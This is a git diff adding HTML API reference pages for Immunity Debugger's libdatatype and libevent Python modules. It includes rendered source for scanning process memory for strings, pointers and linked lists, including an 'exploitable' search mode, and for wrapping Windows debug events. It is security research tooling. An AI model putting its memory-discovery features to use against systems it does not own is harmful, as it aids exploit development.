+ 63 0x00 , 0x00 , 0x02 , 0x00 , 0x02 , 0x02 , 0x02 , 0x02 ,
+ 64
+ 65 0x00 , 0x00 , 0x00 , 0x02 , 0x00 , 0x02 , 0x00 , 0x02 ,
+ 66 0x00 , 0x03 , 0x02 , 0x00 , 0x00 , 0x00 , 0x03 , 0x02 ,
+ 67
+ 68 0x00 , 0x02 , 0x00 , 0x02 , 0x00 , 0x02 , 0x00 , 0x00 ,
+ 69 0x00 , 0x02 , 0x02 , 0x00 , 0x02 , 0x00 , 0x02 , 0x02 ,
+ 70
+ 71 0x02 , 0x02 , 0x02 , 0x02 , 0x02 , 0x02 , 0x02 , 0x02 ,
+ 72 0x02 , 0x02 , 0x02 , 0x02 , 0x02 , 0x02 , 0x02 , 0x02 ,
+ 73
+ 74 0x02 , 0x02 , 0x02 , 0x02 , 0x02 , 0x02 , 0x02 , 0x00 ,
+ 75 0x02 , 0x02 , 0x02 , 0x02 , 0x02 , 0x02 , 0x02 , 0x02 ,
+ 76
+ 77 0x02 , 0x02 , 0x02 , 0x02 , 0x02 , 0x02 , 0x02 , 0x02 ,
+ 78 0x02 , 0x02 , 0x02 , 0x02 , 0x02 , 0x02 , 0x02 , 0x02 ,
+ 79
+ 80 0x02 , 0x02 , 0x02 , 0x02 , 0x02 , 0x02 , 0x02 , 0x00 ,
+ 81 0x02 , 0x02 , 0x02 , 0x02 , 0x02 , 0x02 , 0x02 , 0x00 ]
+ 82
+
84 - def __init__ ( self , type , address , data = None , size = 0 ) :
+
85 """ Base Data Class """
+
86 self . type = type
+
87 self . size = size
+
88 self . data = data
+
89 self . address = address
+
90 self . comment = ''
+
91 self . name = 'Data'
+
92
+
95
+
98
+
100 """
+
101 Return information on the object
+
102
+
103 @rtype: STRING
+
104 @return: Object information
+
105 """
+
106 return str ( self . data )
+
107
+
109 """
+
110 Return object's size
+
111
+
112 @rtype: Integer
+
113 @return: Object's Size
+
114 """
+
115 return self . size
+
116
+
118 """
+
119 Return object's address
+
120
+
121 @rtype: Integer
+
122 @return: Object's address
+
123 """
+
124 return self . address
+
125
+
128 """ String Class """
+
129 Data . __init__ ( self , STRING , address , data , len ( data ) )
+
130 self . name = 'String'
+
131
+
133 if self . data [ - 1 ] == "\x00" :
+
134 return self . data [ 0 : - 1 ]
+
135 else :
+
136 return "'%s'" % self . data
+
137
+
140 """ Unicode Class """
+
141 Data . __init__ ( self , UNICODE , address , data , len ( data ) * 2 )
+
142 self . name = 'Unicode'
+
144 if self . data [ - 1 ] == "\x00" :
+
145 return immutils . prettyhexprint ( self . data [ 0 : - 1 ] )
+
146 else :
+
147 return "'%s'" % self . data
+
148
+149
+
152 """ Double Linked list Class """
+
153 Data . __init__ ( self , DOUBLEL , address , data , 8 )
+
154 self . name = 'Double Linked List'
+
155
+
157 return "( 0x%08x, 0x%08x )" % ( self . data [ 0 ] , self . data [ 1 ] )
+
158
+159 PTR = 0 160 FUNCTION_PTR = 1 161 DATA_PTR = 2 162 STACK_PTR = 3 163
+
166 """ Pointer Class """
+
167 Data . __init__ ( self , POINTER , address , data , 4 )
+
168 self . mem = None
+
169 self . name = 'Pointer'
+
170 self . ptype = PTR
+
171
+
174
+
176 return self . ptype == PTR
+
177
+
180
+
183
+
185 mem = self . mem
+
186
+
187 if self . mem :
+
188 return "0x%08x in %s|%s " % ( self . data , self . mem . getOwner ( ) , self . mem . section )
+
189 return "0x%08x" % self . data
+
190
+
191 - def setMemPage ( self , mem ) :
+
192 self . mem = mem
+
193
+
194 if self . mem :
+
195
+
196 if self . mem . section == ".text" :
+
197 self . ptype = FUNCTION_PTR
+
198 self . name = 'Function Pointer:'
+
199
+
200 elif self . mem . section == ".data" :
+
201 self . ptype = DATA_PTR
+
202 self . name = 'Data Pointer:'
+
203
+204
+
207 """
+
208 Data Discovery Class
+
209
+
210 @type imm: Debugger Object
+
211 @param imm: Initialized debugged object
+
212 """
+
213
+
214 self . MemPages = imm . getMemoryPages ( )
+
215 self . imm = imm
+
216
+
217 self . AllFunctions = [ ( self . isDoubleLinkedList , MEM ) , ( self . isString , MEM ) , \
+
218 ( self . isUnicode , MEM ) , ( self . isPointer , DWORD ) ]
+
219 self . DiscoverWhat = { 'all' : self . AllFunctions , \
+
220 'pointers' : [ ( self . isPointer , DWORD ) ] , \
+
221 'strings' : [ ( self . isString , MEM ) , ( self . isUnicode , MEM ) ] , \
+
222 'asciistrings' : [ ( self . isString , MEM ) ] , \
+
223 'unicodestrings' : [ ( self . isUnicode , MEM ) ] , \
+
224 'doublelinkedlists' : [ ( self . isDoubleLinkedList , MEM ) ] , \
+
225 'exploitable' : [ ( self . isPointer , DWORD ) , ( self . isDoubleLinkedList , MEM ) ]
+
226 }
+
227
+
228 - def Get ( self , address , size , iterate = 4 , what = 'all' ) :
+
229 """
+
230 Discover types on Memory Space
+
231
+
232 @type address: DWORD
+
233 @param address: RVA of the memory to analize
+
234
+
235 @type size: DWORD
+
236 @param size: Size of memory to analize
+
237
+
238 @type iterate: Integer
+
239 @param iterate: (Optional, Def: 4) Iterate through given bytes
+
240
+
241 @type what: STRING
+
242 @param what: (Optional, Def: ALL) What to search for: all, pointers, strings, asciistrings, unicodestrings, doublelinkedlists, exploitable
+
243
+
244 @rtype: List of Discovered Object
+
245 @return: A list of Discovered Objects
+
246 """
+
247
+
248 mem = self . imm . readMemory ( address , size )
+
249 if not mem :
+
250 return [ ]
+
251 return self . Discover ( mem , address , iterate , what )
+
252
+
253 - def Discover ( self , mem , address , iterate = 4 , what = 'all' ) :
+
254 """
+
255 Discover types on Memory Space
+
256
+
257 @type mem: Buffer
+
258 @param mem: Memory to discover
+
259
+
260 @type address: DWORD
+
261 @param address: RVA of the memory
+
262
+
263 @type iterate: Integer
+
264 @param iterate: (Optional, Def: 4) Iterate through given bytes
+
265
+
266 @type what: STRING
+
267 @param what: (Optional, Def: ALL) What to search for: all, pointers, strings, asciistrings, unicodestrings, doublelinkedlists, exploitable
+
268
+
269 @rtype: List of Discovered Object
+
270 @return: A list of Discovered Objects
+
271 """
+
272
+
273 ndx = 0
+
274 discovered = [ ]
+
275
+
276 try :
+
277 Functions = self . DiscoverWhat [ what . lower ( ) ]
+
278 except KeyError :
+
279 return [ ]
+
280
+
281 while ndx < len ( mem ) :
+
282 obj = None
+
283
+
284 for discover_func , tipo in Functions :
+
285
+
286 if tipo == MEM :
+
287 obj = discover_func ( address + ndx , mem [ ndx : ] )
+
288
+
289 elif tipo == DWORD :
+
290 if len ( mem [ ndx : ndx + 4 ] ) >= 4 :
+
291 dword = struct . unpack ( "L" , mem [ ndx : ndx + 4 ] ) [ 0 ]
+
292 obj = discover_func ( address + ndx , dword )
+
293
+
294 if obj :
+
295 break
+
296 if obj :
+
297 discovered . append ( obj )
+
298 ndx += obj . getSize ( )
+
299
+
300 if ndx % iterate :
+
301 ndx = iterate + ndx & ~ ( iterate - 1 )
+
302
+
303 else :
+
304 ndx += iterate
+
305
+
306 return discovered
+
307
+
308 - def isUnicode ( self , address , mem , max_size = 4 * 2 ) :
+
309 ret = [ ]
+
310 for a in range ( 0 , len ( mem ) , 2 ) :
+
311 ndx = struct . unpack ( "H" , mem [ a : a + 2 ] ) [ 0 ]
+
312 if ndx & 0xFF00 :
+
313 return False
+
314
+
315 if not ( ctable [ ndx & 0x00FF ] & PLAINASCII ) :
+
316 break
+
317 ret . append ( chr ( ndx & 0x00FF ) )
+
318
+
319 if a < max_size :
+
320 return None
+
321
+
322 if ndx == 0x0000 :
+
323 ret . append ( " " )
+
324
+
325 return Unicode ( address , "" . join ( ret ) )
+
326
+
327 - def isString ( self , address , mem , max_size = 4 ) :
+
328
+
329 for a in range ( 0 , len ( mem ) ) :
+
330 ndx = ord ( mem [ a ] )
+
331 if not ( ctable [ ndx ] & PLAINASCII ) :
+
332 break
+
333
+
334
+
335
+
336 if a < max_size :
+
337 return None
+
338 if ndx == 0x0 :
+
339 a += 1
+
340 return String ( address , mem [ 0 : a ] )
+
341
+
342
+
353
+
355 if len ( mem ) < 8 :
+
356 return False
+
357 ptr1 = immutils . str2littleendian ( mem [ 0 : 4 ] )
+
358 ptr2 = immutils . str2littleendian ( mem [ 4 : 8 ] )
+
359 try :
+
360 ptr1_dword = self . imm . readLong ( ptr1 )
+
361 ptr1_dword2 = self . imm . readLong ( ptr1 + 4 )
+
362 ptr2_dword = self . imm . readLong ( ptr2 )
+
363 ptr2_dword2 = self . imm . readLong ( ptr2 + 4 )
+
364 except Exception :
+
365 return False
+
366
+
367 if ( address == ptr1_dword or address == ptr1_dword2 ) and \
+
368 ( address == ptr2_dword or address == ptr2_dword2 ) :
+
369 dl = DoubleLinkedList ( address , ( ptr1 , ptr2 ) )
+
370 return dl
+
371
+
372 return False
+
373
+
376
+377
+378
+379 if __name__ == '__main__' : 380 d = DataTypes ( )
+381 assert ( d . isString ( "ho\nA\x01" ) == True )
+382 assert ( d . isString ( "\x01COCA" ) == False )
+383
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libdatatype.Data-class.html b/1.73/Documentation/Ref/Libs.libdatatype.Data-class.html
new file mode 100755
index 0000000..4e5ead2
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libdatatype.Data-class.html
@@ -0,0 +1,322 @@
+
+
+
+
+ Libs.libdatatype.Data
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+Class Data source code
+Known Subclasses:
+
+
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ type ,
+ address ,
+ data =None ,
+ size =0 )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ setComment (self ,
+ comment )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ STRING
+
+
+
+
+
+
+
+ Integer
+
+
+
+
+
+
+
+ Integer
+
+
+
+
+
+
+
+
+
+
+
+
+ Return information on the object
+
+ Returns: STRING
+ Object information
+
+
+
+
+
+
+
+ Return object's size
+
+ Returns: Integer
+ Object's Size
+
+
+
+
+
+
+
+ Return object's address
+
+ Returns: Integer
+ Object's address
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libdatatype.DataTypes-class.html b/1.73/Documentation/Ref/Libs.libdatatype.DataTypes-class.html
new file mode 100755
index 0000000..a1a9582
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libdatatype.DataTypes-class.html
@@ -0,0 +1,387 @@
+
+
+
+
+ Libs.libdatatype.DataTypes
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+Class DataTypes source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+ List of Discovered Object
+
+
+
+ Get (self ,
+ address ,
+ size ,
+ iterate =4 ,
+ what ='all'
+ source code
+
+
+
+
+
+
+
+ List of Discovered Object
+
+
+
+ Discover (self ,
+ mem ,
+ address ,
+ iterate =4 ,
+ what ='all'
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ isUnicode (self ,
+ address ,
+ mem ,
+ max_size =8 )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ isString (self ,
+ address ,
+ mem ,
+ max_size =4 )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ isPointer (self ,
+ address ,
+ dword )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ isDoubleLinkedList (self ,
+ address ,
+ mem )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ imm )(Constructor)
+ source code
+
+ Data Discovery Class
+
+ Parameters:
+
+ imm
+
+
+
+
+
+
+ Get (self ,
+ address ,
+ size ,
+ iterate =4 ,
+ what ='all' source code
+
+ Discover types on Memory Space
+
+ Parameters:
+
+ addresssizeiteratewhat Returns: List of Discovered Object
+ A list of Discovered Objects
+
+
+
+
+
+
+
+ Discover (self ,
+ mem ,
+ address ,
+ iterate =4 ,
+ what ='all' source code
+
+ Discover types on Memory Space
+
+ Parameters:
+
+ memaddressiteratewhat Returns: List of Discovered Object
+ A list of Discovered Objects
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libdatatype.DoubleLinkedList-class.html b/1.73/Documentation/Ref/Libs.libdatatype.DoubleLinkedList-class.html
new file mode 100755
index 0000000..812336e
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libdatatype.DoubleLinkedList-class.html
@@ -0,0 +1,249 @@
+
+
+
+
+ Libs.libdatatype.DoubleLinkedList
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+Class DoubleLinkedList source code
+
+Data --+
+ |
+ DoubleLinkedList
+
+
+
+
+
+
+
+ __init__ (self ,
+ address ,
+ data )(Constructor)
+ source code
+
+ Double Linked list Class
+
+ Overrides:
+ Data.__init__
+
+
+
+
+
+
+
+
+ Return information on the object
+
+ Returns: STRING
+ Object information
+ Overrides:
+ Data.Print
+ (inherited documentation)
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libdatatype.Pointer-class.html b/1.73/Documentation/Ref/Libs.libdatatype.Pointer-class.html
new file mode 100755
index 0000000..13beb61
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libdatatype.Pointer-class.html
@@ -0,0 +1,330 @@
+
+
+
+
+ Libs.libdatatype.Pointer
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+Class Pointer source code
+
+Data --+
+ |
+ Pointer
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ STRING
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Inherited from Data :
+ getAddress getSize setComment setData
+
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ address ,
+ data )(Constructor)
+ source code
+
+ Pointer Class
+
+ Overrides:
+ Data.__init__
+
+
+
+
+
+
+
+
+ Return information on the object
+
+ Returns: STRING
+ Object information
+ Overrides:
+ Data.Print
+ (inherited documentation)
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libdatatype.String-class.html b/1.73/Documentation/Ref/Libs.libdatatype.String-class.html
new file mode 100755
index 0000000..9dd1784
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libdatatype.String-class.html
@@ -0,0 +1,249 @@
+
+
+
+
+ Libs.libdatatype.String
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+Class String source code
+
+Data --+
+ |
+ String
+
+
+
+
+
+
+
+ __init__ (self ,
+ address ,
+ data )(Constructor)
+ source code
+
+ String Class
+
+ Overrides:
+ Data.__init__
+
+
+
+
+
+
+
+
+ Return information on the object
+
+ Returns: STRING
+ Object information
+ Overrides:
+ Data.Print
+ (inherited documentation)
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libdatatype.Unicode-class.html b/1.73/Documentation/Ref/Libs.libdatatype.Unicode-class.html
new file mode 100755
index 0000000..e47b4b8
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libdatatype.Unicode-class.html
@@ -0,0 +1,249 @@
+
+
+
+
+ Libs.libdatatype.Unicode
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+Class Unicode source code
+
+Data --+
+ |
+ Unicode
+
+
+
+
+
+
+
+ __init__ (self ,
+ address ,
+ data )(Constructor)
+ source code
+
+ Unicode Class
+
+ Overrides:
+ Data.__init__
+
+
+
+
+
+
+
+
+ Return information on the object
+
+ Returns: STRING
+ Object information
+ Overrides:
+ Data.Print
+ (inherited documentation)
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libevent-module.html b/1.73/Documentation/Ref/Libs.libevent-module.html
new file mode 100755
index 0000000..f157891
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libevent-module.html
@@ -0,0 +1,292 @@
+
+
+
+
+ Libs.libevent
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libevent
+
+
+
+
+
+
+
+
+Module libevent source code
+(c) Immunity, Inc. 2004-2007
+ Immunity
+ Inc.
+
+
+
+
+
+
+
+
+ __VERSION__ = '1.0'
+
+
+
+
+
+ EXCEPTION_CODE = {2147483649: 'GuardPage', 2147483651: 'Breakp...
+
+
+
+
+
+
+ EXCEPTION_CODE
+
+
+
+
+ Value:
+
+{2147483649: 'GuardPage',
+ 2147483651: 'Breakpoint',
+ 2147483652: 'SingleStep',
+ 3221225477: 'AccessViolation',
+ 3221225501: 'IllegalInstruction',
+ 3221225509: 'NonContinuableException',
+ 3221225612: 'ArrayBoundsExceeded',
+ 3221225613: 'FltDenormalOperand',
+...
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libevent-pysrc.html b/1.73/Documentation/Ref/Libs.libevent-pysrc.html
new file mode 100755
index 0000000..acf3bbf
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libevent-pysrc.html
@@ -0,0 +1,1152 @@
+
+
+
+
+ Libs.libevent
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libevent
+
+
+
+
+
+
+
+
+
+ 1
+ 2
+ 3 """ 4 (c) Immunity, Inc. 2004-2007 5 6 7 U{Immunity Inc.<http://www.immunityinc.com>} 8 9 10 11 """ 12
+ 13 __VERSION__ = '1.0' 14 import debugger 15
+
18 self . dwDebugEventCode = event [ 0 ] [ 0 ]
+
19 self . dwProcessId = event [ 0 ] [ 1 ]
+
20 self . dwThreadId = event [ 0 ] [ 2 ]
+
21 self . _GetValues ( event )
+
22
+
24 return self . dwDebugEventCode == debugger . CREATE_PROCESS_DEBUG_EVENT
+
25
+
27 return self . dwDebugEventCode == debugger . CREATE_THREAD_DEBUG_EVENT
+
28
+
30 return self . dwDebugEventCode == debugger . EXCEPTION_DEBUG_EVENT
+
31
+
33 return self . dwDebugEventCode == debugger . EXIT_PROCESS_DEBUG_EVENT
+
34
+
36 return self . dwDebugEventCode == debugger . EXIT_THREAD_DEBUG_EVENT
+
37
+
39 return self . dwDebugEventCode == debugger . LOAD_DLL_DEBUG_EVENT
+
40
+
42 return self . dwDebugEventCode == debugger . OUTPUT_DEBUG_STRING_EVENT
+
43
+
45 return self . dwDebugEventCode == debugger . UNLOAD_DLL_DEBUG_EVENT
+
46
+
48 return self . dwDebugEventCode == debugger . RIP_EVENT
+
49
+
52
+
56
+
58 self . hFile = event [ 1 ] [ 0 ]
+
59 self . hProcess = event [ 1 ] [ 1 ]
+
60 self . hThread = event [ 1 ] [ 2 ]
+
61 self . lpBaseOfImage = event [ 1 ] [ 3 ]
+
62 self . dwDebugInfoFileOffset = event [ 1 ] [ 4 ]
+
63 self . nDebugInfoSize = event [ 1 ] [ 5 ]
+
64 self . lpThreadLocalBase = event [ 1 ] [ 6 ]
+
65 self . lpStartAddress = event [ 1 ] [ 7 ]
+
66 self . lpImageName = event [ 1 ] [ 8 ]
+
67 self . fUnicode = event [ 1 ] [ 9 ]
+
68
+
72
+
74 self . hThread = [ 1 ] [ 0 ]
+
75 self . lpStartAddress = event [ 1 ] [ 1 ]
+
76 self . lpThreadLocalBase = event [ 1 ] [ 2 ]
+
77
+ 78 EXCEPTION_CODE = { debugger . EXCEPTION_BREAKPOINT : "Breakpoint" , 79 debugger . EXCEPTION_SINGLE_STEP : "SingleStep" ,
+ 80 debugger . EXCEPTION_ACCESS_VIOLATION : "AccessViolation" ,
+ 81 debugger . EXCEPTION_GUARD_PAGE : "GuardPage" ,
+ 82 debugger . EXCEPTION_ARRAY_BOUNDS_EXCEEDED : "ArrayBoundsExceeded" ,
+ 83 debugger . EXCEPTION_FLT_DENORMAL_OPERAND : "FltDenormalOperand" ,
+ 84 debugger . EXCEPTION_FLT_DIVIDE_BY_ZERO : "FltDivideByZero" ,
+ 85 debugger . EXCEPTION_FLT_INEXACT_RESULT : "FltInexactResult" ,
+ 86 debugger . EXCEPTION_FLT_INVALID_OPERATION : "FltInvalidOperation" ,
+ 87 debugger . EXCEPTION_FLT_OVERFLOW : "FltOverflow" ,
+ 88 debugger . EXCEPTION_FLT_STACK_CHECK : "FltStackCheck" ,
+ 89 debugger . EXCEPTION_FLT_UNDERFLOW : "FltUnderflow" ,
+ 90 debugger . EXCEPTION_INT_DIVIDE_BY_ZERO : "IntDivideByZero" ,
+ 91 debugger . EXCEPTION_INT_OVERFLOW : "IntOverflow" ,
+ 92 debugger . EXCEPTION_PRIV_INSTRUCTION : "PrivInstruction" ,
+ 93 debugger . EXCEPTION_ILLEGAL_INSTRUCTION : "IllegalInstruction" ,
+ 94 debugger . EXCEPTION_NONCONTINUABLE_EXCEPTION : "NonContinuableException" ,
+ 95 debugger . EXCEPTION_STACK_OVERFLOW : "StackOverflow"
+ 96 }
+ 97
+
100 self . ExceptionCode = er [ 0 ]
+
101 self . ExceptionFlags = er [ 1 ]
+
102 self . ExceptionAddress = er [ 2 ]
+
103 self . NumberParameters = er [ 3 ]
+
104 self . ExceptionInformation = er [ 4 ]
+
105 self . ExceptionRecord = er [ 5 ]
+
106
+
108 return self . isAccessViolation ( ) and self . ExceptionInformation [ 0 ] != 1 and self . ExceptionInformation [ 0 ] == self . ExceptionAddress
+
109
+
112
+
114 return self . isAccessViolation ( ) and self . ExceptionInformation [ 0 ] != 1 and self . ExceptionInformation [ 0 ] != self . ExceptionAddress
+
115
+
117 return self . ExceptionCode == debugger . EXCEPTION_BREAKPOINT
+
118
+
120 return self . ExceptionCode == debugger . EXCEPTION_SINGLE_STEP
+
121
+
123 return self . ExceptionCode == debugger . EXCEPTION_ACCESS_VIOLATION
+
124
+
125 - def isGuardPage ( self ) :
+
126 return self . ExceptionCode == debugger . EXCEPTION_GUARD_PAGE
+
127
+
129 return self . ExceptionCode == debugger . EXCEPTION_ARRAY_BOUNDS_EXCEEDED
+
130
+
132 return self . ExceptionCode == debugger . EXCEPTION_FLT_DENORMAL_OPERAND
+
133
+
135 return self . ExceptionCode == debugger . EXCEPTION_FLT_DIVIDE_BY_ZERO
+
136
+
138 return self . ExceptionCode == debugger . EXCEPTION_FLT_INEXACT_RESULT
+
139
+
141 return self . ExceptionCode == debugger . EXCEPTION_FLT_INVALID_OPERATION
+
142
+
144 return self . ExceptionCode == debugger . EXCEPTION_FLT_OVERFLOW
+
145
+
147 return self . ExceptionCode == debugger . EXCEPTION_FLT_STACK_CHECK
+
148
+
150 return self . ExceptionCode == debugger . EXCEPTION_FLT_UNDERFLOW
+
151
+
153 return self . ExceptionCode == debugger . EXCEPTION_INT_DIVIDE_BY_ZERO
+
154
+
156 return self . ExceptionCode == debugger . EXCEPTION_INT_OVERFLOW
+
157
+
159 return self . ExceptionCode == debugger . EXCEPTION_PRIV_INSTRUCTION
+
160
+
162 return self . ExceptionCode == debugger . EXCEPTION_ILLEGAL_INSTRUCTION
+
163
+
165 return self . ExceptionCode == debugger . EXCEPTION_NONCONTINUABLE_EXCEPTION
+
166
+
168 return self . ExceptionCode == debugger . EXCEPTION_STACK_OVERFLOW
+
169
+
171 try :
+
172 return EXCEPTION_CODE [ self . ExceptionCode ]
+
173 except KeyError :
+
174 return "UknownException"
+
175
+
178
+179
+
183
+
185 self . dwFirstChance = event [ 1 ] [ 0 ]
+
186 self . Exception = [ ]
+
187 for er in range ( 1 , len ( event [ 1 ] ) ) :
+
188 self . Exception . append ( ExceptionRecord ( event [ 1 ] [ er ] ) )
+
189
+
193
+
195 self . dwExitCode = event [ 1 ] [ 0 ]
+
196
+
200
+
202 self . dwExitCode = event [ 1 ] [ 0 ]
+
203
+
207
+
209 self . hFile = event [ 1 ] [ 0 ]
+
210 self . lpBaseOfDll = event [ 1 ] [ 1 ]
+
211 self . dwDebugInfoFileOffset = event [ 1 ] [ 2 ]
+
212 self . nDebugInfoSize = event [ 1 ] [ 3 ]
+
213 self . lpImageName = event [ 1 ] [ 4 ]
+
214 self . fUnicode = event [ 1 ] [ 5 ]
+
215
+
219
+
221 self . lpDebugStringData = event [ 1 ] [ 0 ]
+
222 self . fUnicode = event [ 1 ] [ 1 ]
+
223 self . nDebugStringLength = event [ 1 ] [ 2 ]
+
224
+
228
+
230 self . dwError = event [ 1 ] [ 0 ]
+
231 self . dwType = event [ 1 ] [ 1 ]
+
232
+
236
+
238 self . lpBaseOfDll = event [ 1 ] [ 0 ]
+
239
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libevent.CreateProcessEvent-class.html b/1.73/Documentation/Ref/Libs.libevent.CreateProcessEvent-class.html
new file mode 100755
index 0000000..f788560
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libevent.CreateProcessEvent-class.html
@@ -0,0 +1,249 @@
+
+
+
+
+ Libs.libevent.CreateProcessEvent
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libevent ::
+ Class CreateProcessEvent
+
+
+
+
+
+
+
+
+Class CreateProcessEvent source code
+
+Event --+
+ |
+ CreateProcessEvent
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libevent.CreateThreadEvent-class.html b/1.73/Documentation/Ref/Libs.libevent.CreateThreadEvent-class.html
new file mode 100755
index 0000000..7aeb967
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libevent.CreateThreadEvent-class.html
@@ -0,0 +1,249 @@
+
+
+
+
+ Libs.libevent.CreateThreadEvent
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libevent ::
+ Class CreateThreadEvent
+
+
+
+
+
+
+
+
+Class CreateThreadEvent source code
+
+Event --+
+ |
+ CreateThreadEvent
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libevent.Event-class.html b/1.73/Documentation/Ref/Libs.libevent.Event-class.html
new file mode 100755
index 0000000..d437fc5
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libevent.Event-class.html
@@ -0,0 +1,312 @@
+
+
+
+
+ Libs.libevent.Event
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+Class Event source code
+Known Subclasses:
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libevent.ExceptionEvent-class.html b/1.73/Documentation/Ref/Libs.libevent.ExceptionEvent-class.html
new file mode 100755
index 0000000..db4b88b
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libevent.ExceptionEvent-class.html
@@ -0,0 +1,249 @@
+
+
+
+
+ Libs.libevent.ExceptionEvent
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libevent ::
+ Class ExceptionEvent
+
+
+
+
+
+
+
+
+Class ExceptionEvent source code
+
+Event --+
+ |
+ ExceptionEvent
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libevent.ExceptionRecord-class.html b/1.73/Documentation/Ref/Libs.libevent.ExceptionRecord-class.html
new file mode 100755
index 0000000..12dcfa5
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libevent.ExceptionRecord-class.html
@@ -0,0 +1,512 @@
+
+
+
+
